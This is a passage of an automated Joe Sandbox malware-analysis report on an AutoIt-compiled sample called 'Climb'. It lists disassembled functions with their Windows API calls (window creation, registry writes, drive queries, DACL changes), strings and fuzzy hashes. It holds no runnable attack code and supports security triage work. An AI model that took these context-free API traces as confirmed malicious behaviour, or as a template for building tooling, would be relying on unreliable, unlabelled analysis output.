Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 9a4100d4c7e63f75da7e17c4ddf6d5ded89da372b8d23cc705de1689a537786b
Instruction ID: d84dd8aa20200d5a57edd75bea1b4c3639d8b1f066045f267ad9551ac06feb9f
Opcode Fuzzy Hash: 9a4100d4c7e63f75da7e17c4ddf6d5ded89da372b8d23cc705de1689a537786b
Instruction Fuzzy Hash: EA028D71A00215AFDB14DF65CC89EAE7BB9FF49310F008959F915AB2A0CB74AE05DF60

Function 00481625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 004816B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 004C2B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 004C2B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004C2F85

Part of subcall function 00481802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00481488,?,00000000,?,?,?,?,0048145A,00000000,?), ref: 00481865

SendMessageW.USER32(?,00001053), ref: 004C2FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 004C2FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 004C2FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 004C2FF9

Strings

(U, xrefs: 004C2B86
(U, xrefs: 004C3035
0, xrefs: 004C2E11
(U, xrefs: 004C2CA1

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$(U$(U$(U
API String ID: 2760611726-3411188392
Opcode ID: a1941c8fa97cb0c14a3127e589832f2461886bc844da9dd9aa61b2b5a7febdbd
Instruction ID: 6c2e485ff45122e67b192286ff6a9cc9cd93066b16f41d5d789ee1db8d1c5469
Opcode Fuzzy Hash: a1941c8fa97cb0c14a3127e589832f2461886bc844da9dd9aa61b2b5a7febdbd
Instruction Fuzzy Hash: D712EE38200201AFC764DF14C954FAAB7F5FB55301F18852FE489AB361C7B9AC86DB99

Function 0050316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0050319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 005032C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00503306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00503316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0050335D
GetClientRect.USER32(00000000,?), ref: 00503369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 005033B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 005033C1
GetStockObject.GDI32(00000011), ref: 005033D1
SelectObject.GDI32(00000000,00000000), ref: 005033D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 005033E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005033EE
DeleteDC.GDI32(00000000), ref: 005033F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00503423
SendMessageW.USER32(00000030,00000000,00000001), ref: 0050343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0050347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0050348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 0050349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 005034D4
GetStockObject.GDI32(00000011), ref: 005034DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 005034EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 005034F4

Strings

AutoIt v3, xrefs: 00503355
msctls_progress32, xrefs: 00503470
DISPLAY, xrefs: 005033B7
static, xrefs: 005033AC, 005034CE

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 2e0552ba4909af6394c87b3d6ae235de3c40f16e2748ee8624162f7ff74edfa8
Instruction ID: 3edb5f5e384c07b3bb8a93a7e2152f7192264b2463e1574a816da1284ec326db
Opcode Fuzzy Hash: 2e0552ba4909af6394c87b3d6ae235de3c40f16e2748ee8624162f7ff74edfa8
Instruction Fuzzy Hash: 51B15B71A40205AFEB10DFA8CC49FAE7BB9FB18714F008519FA15E7290C774AD04DBA4

Function 004F5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004F5532
GetDriveTypeW.KERNEL32(?,0051DC30,?,\\.\,0051DCD0), ref: 004F560F
SetErrorMode.KERNEL32(00000000,0051DC30,?,\\.\,0051DCD0), ref: 004F577B

Strings

SCSI, xrefs: 004F56CF
SAS, xrefs: 004F570E
ATAPI, xrefs: 004F56D6
Fibre, xrefs: 004F56F2
SSA, xrefs: 004F56EB
Removable, xrefs: 004F5655, 004F565A
CDROM, xrefs: 004F5640
MMC, xrefs: 004F5723
1394, xrefs: 004F56E4
FileBackedVirtual, xrefs: 004F5731
RAID, xrefs: 004F5700
Unknown, xrefs: 004F5632, 004F56C8
PhysicalDrive, xrefs: 004F55BB
Fixed, xrefs: 004F564E
Network, xrefs: 004F5647
USB, xrefs: 004F56F9
Virtual, xrefs: 004F572A
RAMDisk, xrefs: 004F5639
\\.\, xrefs: 004F5584
SATA, xrefs: 004F5715
SSD, xrefs: 004F568F
ATA, xrefs: 004F56DD
iSCSI, xrefs: 004F5707

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 278c87289b679c01f20640530505d508f706f72d8e1bdc8587fb44f03feae7c4
Instruction ID: ea7f51c789b474e235ce3ffde7f375109eaa79e136120b2104dcd9f43d9bb924
Opcode Fuzzy Hash: 278c87289b679c01f20640530505d508f706f72d8e1bdc8587fb44f03feae7c4
Instruction Fuzzy Hash: 4461C230A4490DEBD714EF24C9918BE7BE1FF18358F24446BE71A9B251C7399D02CB9A

Function 00482521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004825F8
GetSystemMetrics.USER32(00000007), ref: 00482600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0048262B
GetSystemMetrics.USER32(00000008), ref: 00482633
GetSystemMetrics.USER32(00000004), ref: 00482658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00482675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00482685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004826B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004826CC
GetClientRect.USER32(00000000,000000FF), ref: 004826EA
GetStockObject.GDI32(00000011), ref: 00482706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00482711

Part of subcall function 004819CD: GetCursorPos.USER32(?), ref: 004819E1
Part of subcall function 004819CD: ScreenToClient.USER32(00000000,?), ref: 004819FE
Part of subcall function 004819CD: GetAsyncKeyState.USER32(00000001), ref: 00481A23
Part of subcall function 004819CD: GetAsyncKeyState.USER32(00000002), ref: 00481A3D

SetTimer.USER32(00000000,00000000,00000028,0048199C), ref: 00482738

Strings

<)U, xrefs: 0048255C
AutoIt v3 GUI, xrefs: 004826B0
(U, xrefs: 0048271A
(U, xrefs: 004C3909
<)U, xrefs: 004C39A6
(U, xrefs: 00482749

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: <)U$<)U$AutoIt v3 GUI$(U$(U$(U
API String ID: 1458621304-3646542569
Opcode ID: fd2600bb49f01741759d2607b964ef984db657a4dc838c58759f88355bc8da35
Instruction ID: 83e927e8f7e07f91f7d930259fa13bd385adcaf1dcf55b2967fa15ea3c40893f
Opcode Fuzzy Hash: fd2600bb49f01741759d2607b964ef984db657a4dc838c58759f88355bc8da35
Instruction Fuzzy Hash: B8B1CD75A00209AFCB14EFA8CC45FEE3BB4FB48315F00812AFA05A72A0D778E945DB55

Function 00511A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00511BC4
GetDesktopWindow.USER32 ref: 00511BD9
GetWindowRect.USER32(00000000), ref: 00511BE0
GetWindowLongW.USER32(?,000000F0), ref: 00511C35
DestroyWindow.USER32(?), ref: 00511C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00511C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00511CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00511CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00511CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00511CE1
IsWindowVisible.USER32(00000000), ref: 00511D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00511D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00511D6C
GetWindowRect.USER32(00000000,?), ref: 00511D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00511DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00511DC4
CopyRect.USER32(?,?), ref: 00511DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00511E46

Strings

(, xrefs: 00511DB7
tooltips_class32, xrefs: 00511C82
0, xrefs: 00511B6F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 9dabafb8e5a37facdde8b5ce30e61ecf4ac1bd8572c8282b69cfed04400932c9
Instruction ID: 301f5cf995c3df795b52cab3faf658a7b2f49987edd5b51a02b1cc301c784cd3
Opcode Fuzzy Hash: 9dabafb8e5a37facdde8b5ce30e61ecf4ac1bd8572c8282b69cfed04400932c9
Instruction Fuzzy Hash: 47B18A71604701AFE704DF65C884BAABFE5FF94314F00895DF9999B2A1C731E884CBA6

Function 00510CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00510D81
_wcslen.LIBCMT ref: 00510DBB
_wcslen.LIBCMT ref: 00510E25
_wcslen.LIBCMT ref: 00510E8D
_wcslen.LIBCMT ref: 00510F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00510F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00510FA0

Part of subcall function 0049FD52: _wcslen.LIBCMT ref: 0049FD5D

Part of subcall function 004E2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004E2BA5
Part of subcall function 004E2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004E2BD7

Strings

GETSUBITEMCOUNT, xrefs: 00510E20, 00510E3B
SELECTCLEAR, xrefs: 00510FC9
SELECTALL, xrefs: 00510FB1
FINDITEM, xrefs: 005110C3
ISSELECTED, xrefs: 00510F79
GETSELECTED, xrefs: 0051107D
GETSELECTEDCOUNT, xrefs: 00510F0C, 00510F27
VIEWCHANGE, xrefs: 00511111
SELECT, xrefs: 00510FE4
DESELECT, xrefs: 00511038
SELECTINVERT, xrefs: 0051101A
GETITEMCOUNT, xrefs: 00510DB2, 00510DD3
GETTEXT, xrefs: 00510E88, 00510EA3

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 5af2eaef63dc05aef5e79a4d02179b81c5902a1b5d63750a86464b5d621eb365
Instruction ID: b40dc41ecddee0d7adea63878715db55fd21530f70424deb9cd743cafb42f55c
Opcode Fuzzy Hash: 5af2eaef63dc05aef5e79a4d02179b81c5902a1b5d63750a86464b5d621eb365
Instruction Fuzzy Hash: E0E100312082418FD714EF25C9818BEBBE6FF88318B10496DF4969B3A1DB74ED85CB95

Function 004E16D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004E1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004E1A60
Part of subcall function 004E1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,004E14E7,?,?,?), ref: 004E1A6C
Part of subcall function 004E1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004E14E7,?,?,?), ref: 004E1A7B
Part of subcall function 004E1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004E14E7,?,?,?), ref: 004E1A82
Part of subcall function 004E1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004E1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004E1741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004E1775
GetLengthSid.ADVAPI32(?), ref: 004E178C
GetAce.ADVAPI32(?,00000000,?), ref: 004E17C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004E17E2
GetLengthSid.ADVAPI32(?), ref: 004E17F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 004E1801
HeapAlloc.KERNEL32(00000000), ref: 004E1808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 004E1829
CopySid.ADVAPI32(00000000), ref: 004E1830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004E185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004E1881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 004E1893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E18BA
HeapFree.KERNEL32(00000000), ref: 004E18C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E18CA
HeapFree.KERNEL32(00000000), ref: 004E18D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E18DA
HeapFree.KERNEL32(00000000), ref: 004E18E1
GetProcessHeap.KERNEL32(00000000,?), ref: 004E18ED
HeapFree.KERNEL32(00000000), ref: 004E18F4

Part of subcall function 004E1ADF: GetProcessHeap.KERNEL32(00000008,004E14FD,?,00000000,?,004E14FD,?), ref: 004E1AED
Part of subcall function 004E1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,004E14FD,?), ref: 004E1AF4
Part of subcall function 004E1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004E14FD,?), ref: 004E1B03

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 386f16ae6031ffcbea365d87b4c0d8bff579bf20a7db0fd2079d742bd33a3576
Instruction ID: 3726cb908d20fa428eba09b22f649cba5f80de775a2f2a02a4716c642a40600c
Opcode Fuzzy Hash: 386f16ae6031ffcbea365d87b4c0d8bff579bf20a7db0fd2079d742bd33a3576
Instruction Fuzzy Hash: 8E717F71D40249AFDF50EFA6DC48FEFBBB8BF08701F148126E955A62A0D7349A05CB64

Function 0050CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0050CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,0051DCD0,00000000,?,00000000,?,?), ref: 0050CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0050D004
_wcslen.LIBCMT ref: 0050D054
_wcslen.LIBCMT ref: 0050D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0050D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0050D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0050D2AD
RegCloseKey.ADVAPI32(?), ref: 0050D2E1
RegCloseKey.ADVAPI32(00000000), ref: 0050D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0050D3C0

Strings

REG_BINARY, xrefs: 0050D373
REG_QWORD, xrefs: 0050D323
REG_DWORD, xrefs: 0050D264
REG_SZ, xrefs: 0050D0A4
REG_EXPAND_SZ, xrefs: 0050D02D
REG_MULTI_SZ, xrefs: 0050D155

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 5914305aa8eb36c545033bfc62244678b80d64ddbb756c20b032510f72d09290
Instruction ID: 001ba494ba4e453b7541e42c0705201991fe4f0197d73da85c2395a684112e21
Opcode Fuzzy Hash: 5914305aa8eb36c545033bfc62244678b80d64ddbb756c20b032510f72d09290
Instruction Fuzzy Hash: 741256356042019FC714EF15C881A2EBBF6FF88718F04889DF84A9B2A2DB35ED41CB95

Function 005113BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00511462
_wcslen.LIBCMT ref: 0051149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005114F0
_wcslen.LIBCMT ref: 00511526
_wcslen.LIBCMT ref: 005115A2
_wcslen.LIBCMT ref: 0051161D

Part of subcall function 0049FD52: _wcslen.LIBCMT ref: 0049FD5D

Part of subcall function 004E3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004E3547

Strings

SELECT, xrefs: 005117AD
EXISTS, xrefs: 00511618, 00511633
UNCHECK, xrefs: 005117DA
EXPAND, xrefs: 00511694
GETTOTALCOUNT, xrefs: 0051148E, 005114B3
CHECK, xrefs: 00511521, 0051153C
ISCHECKED, xrefs: 0051177D
GETITEMCOUNT, xrefs: 005116BA
COLLAPSE, xrefs: 0051159D, 005115B8
GETSELECTED, xrefs: 005116EA
GETTEXT, xrefs: 00511733

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 4d17bc4cd3ac0cf3e6033df3f866767590dc6950b1be49b4e5208c0b4a2d2357
Instruction ID: ab8d5a0e652f4f0167c9584279ae0d13462405061bddd51ddb62b585748afde5
Opcode Fuzzy Hash: 4d17bc4cd3ac0cf3e6033df3f866767590dc6950b1be49b4e5208c0b4a2d2357
Instruction Fuzzy Hash: 8DE1D3316047018FCB10EF25C4508AEBBE2FF94318B54899DF9969B7A1DB34ED85CB89

Function 0050D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0050C10E,?,?), ref: 0050D415
_wcslen.LIBCMT ref: 0050D451
_wcslen.LIBCMT ref: 0050D4C8
_wcslen.LIBCMT ref: 0050D4FE
_wcslen.LIBCMT ref: 0050D559
_wcslen.LIBCMT ref: 0050D58F
_wcslen.LIBCMT ref: 0050D5DF

Strings

HKCR, xrefs: 0050D589, 0050D58E
HKLM, xrefs: 0050D4F8, 0050D4FD
HKEY_CURRENT_USER, xrefs: 0050D61D
HKCC, xrefs: 0050D60C
HKEY_CURRENT_CONFIG, xrefs: 0050D5D9, 0050D5DE
HKCU, xrefs: 0050D62E
HKU, xrefs: 0050D650
HKEY_LOCAL_MACHINE, xrefs: 0050D4C2, 0050D4C7
HKEY_CLASSES_ROOT, xrefs: 0050D553, 0050D558
HKEY_USERS, xrefs: 0050D63F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 7dcf2a1e7b3a3c429bb26cc9a97fa0a85e5dd2fdbde98fc9d85715053f2783c2
Instruction ID: 67b9751891d81c6f322aaab07f06583543fb6793e165176dfcdc56e997a6fa69
Opcode Fuzzy Hash: 7dcf2a1e7b3a3c429bb26cc9a97fa0a85e5dd2fdbde98fc9d85715053f2783c2
Instruction Fuzzy Hash: 5971C33260052A8BCF109EB8CE515FF3FB1BB61768B250529FC569B2D4EA76DD4483B0

Function 00518D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00518DB5
_wcslen.LIBCMT ref: 00518DC9
_wcslen.LIBCMT ref: 00518DEC
_wcslen.LIBCMT ref: 00518E0F
